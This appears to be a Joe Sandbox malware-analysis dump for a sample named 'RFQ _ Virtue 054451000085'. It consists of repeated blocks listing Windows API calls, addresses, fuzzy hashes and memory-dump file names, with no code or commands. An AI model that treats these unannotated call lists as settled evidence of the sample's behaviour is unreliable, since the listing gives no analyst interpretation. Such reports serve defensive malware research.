                                                                                • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                                                • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                                • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                                                APIs
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047D927
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0047D9AA
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0047D9C6
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0047DA07
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DA21
                                                                                  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 327935632-0
                                                                                • Opcode ID: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
                                                                                • Instruction ID: 2e87ffb2dc156b6f817890f7ff3d29c7ed6bd27adfaf25e4966d104b6097512d
                                                                                • Opcode Fuzzy Hash: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
                                                                                • Instruction Fuzzy Hash: C6512A75A00205DFCB00EFA9C4849AEB7B4FF09324B14C06AE959AB352D739AD45CF59
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1389676194-0
                                                                                • Opcode ID: 656f56ead559e128f5f83d332c140a414846d7d216f388136aca5a634eb78e18
                                                                                • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                                                • Opcode Fuzzy Hash: 656f56ead559e128f5f83d332c140a414846d7d216f388136aca5a634eb78e18
                                                                                • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                                                • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 00402357
                                                                                • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                                                • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                                                APIs
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                                                • TranslateMessage.USER32(?), ref: 0045645C
                                                                                • DispatchMessageW.USER32(?), ref: 00456466
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                • String ID:
                                                                                • API String ID: 2108273632-0
                                                                                • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                                                • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 00458A30
                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                                                • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0045B204
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                                                • _wcsstr.LIBCMT ref: 0045B289
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                • String ID:
                                                                                • API String ID: 3902887630-0
                                                                                • Opcode ID: 23d17219bcdf7b792c257febb425ecba3a1b4e94db5b9134c94f5bfe8b61d5b8
                                                                                • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                                                • Opcode Fuzzy Hash: 23d17219bcdf7b792c257febb425ecba3a1b4e94db5b9134c94f5bfe8b61d5b8
                                                                                • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                                                APIs
                                                                                  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                                                • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 2294984445-0
                                                                                • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                                                • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                                                • __itow.LIBCMT ref: 0045936A
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                                                • __itow.LIBCMT ref: 004593A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow$_memmove
                                                                                • String ID:
                                                                                • API String ID: 2983881199-0
                                                                                • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                                                • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                                                APIs
                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                                • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                                • BeginPath.GDI32(?), ref: 00401373
                                                                                • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                                                • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                                                • __beginthreadex.LIBCMT ref: 00464AD8
                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                • String ID:
                                                                                • API String ID: 3824534824-0
                                                                                • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                                                • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                                                APIs
                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                                                • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                                                • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 842720411-0
                                                                                • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                                                • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                                                APIs
                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                                                • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
